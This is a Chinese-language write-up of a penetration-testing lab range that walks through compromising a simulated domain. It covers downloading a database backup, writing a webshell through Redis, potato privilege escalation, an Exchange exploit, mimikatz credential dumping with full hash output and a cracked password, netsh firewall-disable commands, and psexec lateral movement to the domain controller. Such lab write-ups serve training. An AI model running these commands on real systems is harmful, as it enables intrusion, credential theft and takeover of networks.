暗月6月出师靶机writeup

admin 2021年10月31日21:53:56安全文章评论63 views8589字阅读28分37秒阅读模式

            大概环境长这个样子 

由于nat环境问题 所有192.168.59这个段不一致

暗月6月出师靶机writeup

          

由于没有师傅们的审计能力 只能漏洞复现方式做了

扫描web.rar 导入sql分析发现 这个是旧的 已经没有用了

暗月6月出师靶机writeup


2 这个数据库备份的功能 也被暗月砍掉了 十分感谢暗月

暗月6月出师靶机writeup

3 师傅们给的另一招 下载数据库备份文件

http://www.cocat.cc/kss_admin/admin_data.php

?action=mysqldatabak_down&pwd=安全密码

 

直接notepay++搜全局安全密码

暗月6月出师靶机writeup


下载备份数据库文件 导入 解密


登录后台 怀疑就是暗月给砍掉了

暗月6月出师靶机writeup


这个地方闭合



 

暗月6月出师靶机writeup

路径 默认配置文件

暗月6月出师靶机writeup


Db文件解密

暗月6月出师靶机writeup

宝塔默认端口8888

http://域名:8888/soft

暗月6月出师靶机writeup


然后解封函数即可

暗月6月出师靶机writeup


然后上frp映射端口

暗月6月出师靶机writeup


通过phpinfo查看网站的内网ip

暗月6月出师靶机writeup


现在的情况  那就抓hash

暗月6月出师靶机writeup

暗月6月出师靶机writeup




等等上去关火绒

暗月6月出师靶机writeup



 


Frp将内网3389穿透出去关闭火绒

暗月6月出师靶机writeup



上马 hashdump 迁移进程 梭哈

 

暗月6月出师靶机writeup

redis已经拿下 通过爆破密码


然后通过把cmd 与redis-cli导入

暗月6月出师靶机writeup


坑点 1 写入php提示404 但是写入了

2 写入webshell要单引号

3 两个程序都需要导入代理 cmd与rediscli

 

暗月6月出师靶机writeup


config set dir/home/wwwroot/default/ #windows的web默认路径

 

config setdbfilename redis.php    文件名字

 

set webshell"<?php phpinfo(); ?>"  #webshell

 

save

 

      php可以双引号 不知道为什么这个asp就得单引号了记录一下

第二个机器 上图用redis打穿了 通过代理 蚁剑连接 

然后配上甜土豆提权 关闭防火墙

暗月6月出师靶机writeup


甜土豆坑点1 此版本的甜土豆如果提权需要加入绝对路径


 例如 1.exe -a "c:/windows/*.exe"

然后加路由扫内网

暗月6月出师靶机writeup


本机ip 202

暗月6月出师靶机writeup


一共三个存活 那就是201 开始测试

扫描ip端口

nmap -sV -sC  -sT -Pn -p- 10.10.10.201  过程巨慢可以去打个lol什么的

nmap -sV -sC  -sT -Pn -p- 10.10.10.209

201

然后出来了 域控的机器 还有域控的域名

暗月6月出师靶机writeup

209


开启了80 443

生成正向连接exe 坑点 记得不要带空格

暗月6月出师靶机writeup

然后传入redis服务器的http页面

 

暗月6月出师靶机writeup


代理访问 为outlook 邮箱 翻exp去

坑点 如果是乱码 用*可以正则匹配一下下

 获得邮箱[email protected]

[email protected]

暗月6月出师靶机writeup

 

 用那个outbook邮箱漏洞来打


这个 -i whoami 没什么用。。。直接就是交互式的命令执行

wmic RDTOGGLE WHEREServerName="%COMPUTERNAME%" call SetAllowTSConnections 1

暗月6月出师靶机writeup

关闭防火墙

下载我们刚刚给redis传的文件

暗月6月出师靶机writeup

然后执行命令

暗月6月出师靶机writeup

此处为migrate了一个低权限进程 切记x64 system权限

暗月6月出师靶机writeup

Hashdump为本机的密码 然后载入猕猴桃试试

暗月6月出师靶机writeup

然后就是佳哥教的 抓密码了 msf自带以后没有猕猴桃了

Load kiwi

kiwi_cmd -f sekurlsa::logonPasswords

 

 

Authentication Id : 0 ; 20871772(00000000:013e7a5c)

Session           : NetworkCleartext from 0

User Name         : HealthMailbox3f7d5b8

Domain            : CNCAT

Logon Server      : 12SERVER-DC

Logon Time        : 2021/6/17 16:18:33

SID               :S-1-5-21-296591627-685496165-1408683996-1131

       msv:     

        [00000003] Primary

        * Username : HealthMailbox3f7d5b8

        * Domain  : CNCAT

        * NTLM    : 3fd9fdd66292ffe77e16137d5649ea17

        * SHA1    : 3acc7e64b7b354a1a8a51206bca488d514055b3a

       tspkg:   

       wdigest:

        * Username : HealthMailbox3f7d5b8

        * Domain  : CNCAT

        * Password : (null)

       kerberos:     

        * Username : HealthMailbox3f7d5b8

        * Domain  : CNCAT.CC

        * Password : (null)

       ssp:

       credman:     

 

Authentication Id : 0 ; 20861945(00000000:013e53f9)

Session           : NetworkCleartext from 0

User Name         : HealthMailbox3f7d5b8

Domain            : CNCAT

Logon Server      : 12SERVER-DC

Logon Time        : 2021/6/17 16:18:22

SID               : S-1-5-21-296591627-685496165-1408683996-1131

       msv:     

        [00000003] Primary

        * Username : HealthMailbox3f7d5b8

        * Domain  : CNCAT

        * NTLM    : 3fd9fdd66292ffe77e16137d5649ea17

        * SHA1    : 3acc7e64b7b354a1a8a51206bca488d514055b3a

       tspkg:   

       wdigest:

        * Username : HealthMailbox3f7d5b8

        * Domain  : CNCAT

        * Password : (null)

       kerberos:     

        * Username : HealthMailbox3f7d5b8

        * Domain  : CNCAT.CC

        * Password : (null)

       ssp:

       credman:     

 

Authentication Id : 0 ; 13728747(00000000:00d17beb)

Session           : Interactive from 1

User Name         : administrator

Domain            : CNCAT

Logon Server      : 12SERVER-DC

Logon Time        : 2021/4/28 23:45:24

SID               :S-1-5-21-296591627-685496165-1408683996-500

       msv:     

        [00000003] Primary

        * Username : Administrator

        * Domain  : CNCAT

        * NTLM    : 42e2656ec24331269f82160ff5962387

        * SHA1    : 202a4f252fa716b16cc934c114a2b4423add410d

        [00010000] CredentialKeys

        * NTLM    : 42e2656ec24331269f82160ff5962387

        * SHA1    : 202a4f252fa716b16cc934c114a2b4423add410d

       tspkg:   

       wdigest:

        * Username : Administrator

        * Domain  : CNCAT

        * Password : (null)

       kerberos:     

        * Username : administrator

        * Domain  : CNCAT.CC

        * Password : (null)

       ssp:

       credman:     

 

Authentication Id : 0 ; 86756(00000000:000152e4)

Session           : Interactive from 1

User Name         : DWM-1

Domain            : Window Manager

Logon Server      : (null)

Logon Time        : 2021/4/28 19:52:09

SID              : S-1-5-90-1

       msv:     

        [00000003] Primary

        * Username : 12SERVER-EX13$

        * Domain  : CNCAT

        * NTLM    : 7e0ebfdc16be2cf7652792713162d817

        * SHA1    : a413aeaf7935bab126af11ad8a1221651217e014

       tspkg:   

       wdigest:

        * Username : 12SERVER-EX13$

        * Domain  : CNCAT

        * Password : (null)

       kerberos:     

        * Username : 12SERVER-EX13$

        * Domain  : cncat.cc

        * Password : de 6b 04 cc 34 dc 30 d8 00 ec 9449 84 42 0b 33 7e ba 79 0e ac 56 99 64 ea 10 c8 95 95 55 a4 be 46 42 e6 5a 206e 58 f8 58 bc 35 56 6f ec ad 5a c6 b7 df 2f 1d dc 6c a0 c2 be ff 85 40 45 8d27 86 10 da 8b 48 8e c8 33 b2 23 9f 02 67 c4 06 61 33 1e f7 87 81 e4 0a bc 9158 63 b5 64 c5 27 53 1b a2 1e 1e 3c 4e bc e0 8b 1c 0c 03 60 08 bd 51 11 b6 7267 28 2c 9f e7 ee 1a fa bb 71 15 a6 a1 5d 2a 27 9f dd 11 22 b3 05 8e c3 03 8fc1 79 64 c0 d3 9f a4 93 c1 60 e7 4a 30 e4 fb c0 4b 43 da de 30 2c 9c 2e e8 93d1 1c 6b 3b eb a6 d7 a2 8e 51 f1 20 c9 50 95 e0 84 0d 64 f7 1b 73 11 0b fd bb0b 89 f1 e6 dc 8f e2 71 83 b0 16 42 f0 b7 29 3a c7 2e ae c8 5e c0 6e e8 96 dfa7 52 b8 f3 22 2d fd 9d 99 36 b3 d2 3e 7b e9 54 a5 ab 23 ce 4f

       ssp:

       credman:     

 

Authentication Id : 0 ; 996(00000000:000003e4)

Session           : Service from 0

User Name         : 12SERVER-EX13$

Domain            : CNCAT

Logon Server      : (null)

Logon Time        : 2021/4/28 19:52:09

SID               : S-1-5-20

       msv:     

        [00000003] Primary

        * Username : 12SERVER-EX13$

        * Domain  : CNCAT

        * NTLM    : 7e0ebfdc16be2cf7652792713162d817

        * SHA1    : a413aeaf7935bab126af11ad8a1221651217e014

       tspkg:   

       wdigest:

        * Username : 12SERVER-EX13$

        * Domain  : CNCAT

        * Password : (null)

       kerberos:     

        * Username : 12server-ex13$

        * Domain  : CNCAT.CC

        * Password : (null)

       ssp:

       credman:     

 

Authentication Id : 0 ; 20873779(00000000:013e8233)

Session           : NetworkCleartext from 0

User Name         : HealthMailbox3f7d5b8

Domain            : CNCAT

Logon Server      : 12SERVER-DC

Logon Time        : 2021/6/17 16:18:34

SID               :S-1-5-21-296591627-685496165-1408683996-1131

       msv:     

        [00000003] Primary

        * Username : HealthMailbox3f7d5b8

        * Domain  : CNCAT

        * NTLM    : 3fd9fdd66292ffe77e16137d5649ea17

        * SHA1    : 3acc7e64b7b354a1a8a51206bca488d514055b3a

       tspkg:   

       wdigest:

        * Username : HealthMailbox3f7d5b8

        * Domain  : CNCAT

        * Password : (null)

       kerberos:     

        * Username : HealthMailbox3f7d5b8

        * Domain  : CNCAT.CC

        * Password : (null)

       ssp:

       credman:     

 

Authentication Id : 0 ; 995(00000000:000003e3)

Session          : Service from 0

User Name         : IUSR

Domain            : NT AUTHORITY

Logon Server      : (null)

Logon Time        : 2021/4/28 19:52:16

SID               : S-1-5-17

       msv:     

       tspkg:   

       wdigest:

        * Username : (null)

        * Domain  : (null)

        * Password : (null)

       kerberos:     

       ssp:

       credman:     

 

Authentication Id : 0 ; 997(00000000:000003e5)

Session           : Service from 0

User Name         : LOCAL SERVICE

Domain            : NT AUTHORITY

Logon Server      : (null)

Logon Time        :2021/4/28 19:52:09

SID               : S-1-5-19

       msv:     

       tspkg:   

       wdigest:

        * Username : (null)

        * Domain  : (null)

        * Password : (null)

       kerberos:     

        * Username : (null)

        * Domain  : (null)

        * Password : (null)

       ssp:

       credman:     

 

Authentication Id : 0 ; 52997(00000000:0000cf05)

Session           : UndefinedLogonType from 0

User Name         : (null)

Domain            : (null)

Logon Server      : (null)

Logon Time        : 2021/4/28 19:52:06

SID               :

       msv:     

        [00000003] Primary

        * Username : 12SERVER-EX13$

        * Domain  : CNCAT

        * NTLM    : 7e0ebfdc16be2cf7652792713162d817

        * SHA1    : a413aeaf7935bab126af11ad8a1221651217e014

       tspkg:   

       wdigest:

       kerberos:     

       ssp:

        [00000000]

        * Username : [email protected]

        * Domain  : (null)

        * Password :$9u-LyPp5[j.UeS!I!xb&dpQD5ynJi3*UE3gaMLrcB-UsErNKa+DX%5>@9)[email protected];[email protected]$5gY}#XRd%^@wXflBE+wUa==]zsJz%[email protected]+pVq

        [00000001]

        * Username : [email protected]

        * Domain  : (null)

        * Password :$9u-LyPp5[j.UeS!I!xb&dpQD5ynJi3*UE3gaMLrcB-UsErNKa+DX%5>@9)[email protected];[email protected]$5gY}#XRd%^@wXflBE+wUa==]zsJz%[email protected]+pVq

       credman:     

 

Authentication Id : 0 ; 999(00000000:000003e7)

Session           : UndefinedLogonType from 0

User Name         : 12SERVER-EX13$

Domain            : CNCAT

Logon Server      : (null)

Logon Time        : 2021/4/28 19:52:06

SID               : S-1-5-18

       msv:     

       tspkg:   

       wdigest:

        * Username : 12SERVER-EX13$

        * Domain  : CNCAT

        * Password : (null)

       kerberos:     

        * Username : 12server-ex13$

        * Domain  : CNCAT.CC

        * Password : (null)

       ssp:

       credman:     

 


解密hash

QWEasd123

此时已经基本上ok了 就差最后一台的的域控了

暗月6月出师靶机writeup

此时已经打穿三台了 域控的密码也有了

 此处大约卡了半个小时。。感谢佳哥的细心指导

Use windows/smb/psexec

暗月6月出师靶机writeup

初次设置 弹不回来 分析发现 关闭防火墙即可 弹回来 但是不能手动去关啊。。

然后佳哥教导

windows/x64/exec

set cmd netsh firewall set opmode disable

暗月6月出师靶机writeup

此条命令为关闭域防火墙

用这个关闭所有的防火墙

NetSh Advfirewall set allprofiles state off


暗月6月出师靶机writeup

然后反向连接

暗月6月出师靶机writeup

完事大吉

暗月6月出师靶机writeup


本文始发于微信公众号(阿乐你好):暗月6月出师靶机writeup

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月31日21:53:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  暗月6月出师靶机writeup http://cn-sec.com/archives/403004.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: